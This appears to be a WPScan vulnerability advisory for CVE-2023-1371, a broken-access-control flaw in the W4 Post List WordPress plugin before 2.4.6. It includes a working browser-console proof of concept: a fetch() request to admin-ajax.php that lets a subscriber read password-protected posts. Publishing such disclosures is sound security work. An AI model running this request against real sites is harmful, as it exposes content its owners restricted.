W4 Post List < 2.4.6 – Subscriber+ Password Protected Post Content Disclosure | CVE 2023-1371 | Plugin Vulnerabilities

Description

The plugin does not ensure that password protected posts can be accessed before displaying their content, which could allow any authenticated users to access them

Proof of Concept

Setup: Create a default Post list, and create a password protected post with secret content

Then, run the below command in the developer console of the web browser while being on the blog as a subscriber user

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": "action=parse-media-shortcode&shortcode=[postlist listId='1']",
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));

This will display the content of the password protected post

Affects Plugins

Fixed in 2.4.6

References

CVE

Classification

Type

NO AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Erwan LR (WPScan)

Submitter website

https://wpscan.com

Verified

Yes

WPVDB ID

ad5c167e-77f7-453c-9443-df6e07705d89

Timeline

Publicly Published

2023-03-22 (about 2 years ago)

Added

2023-03-22 (about 2 years ago)

Last Updated

2023-04-24 (about 2 years ago)

Other

Published

Title

Published

2023-07-10

Title

Buy Me a Coffee – Button and Widget Plugin < 3.8 - Subscriber+ Unauthorized Data Modification

Published

2023-12-08

Title

Manage Notification E-mails < 1.8.6 - Missing Authorization

Published

2025-12-08

Title

Page View Count <= 2.8.7 - Missing Authorization to Authenticated (Subscriber+) Settings Update

Published

2025-12-16

Title

Converter for Media < 6.4.0 - Subscriber+ Optimized Image Deletion via regenerate-attachment REST Endpoint

Published

2024-12-02

Title

WP Travel < 9.7.0 - Missing Authorization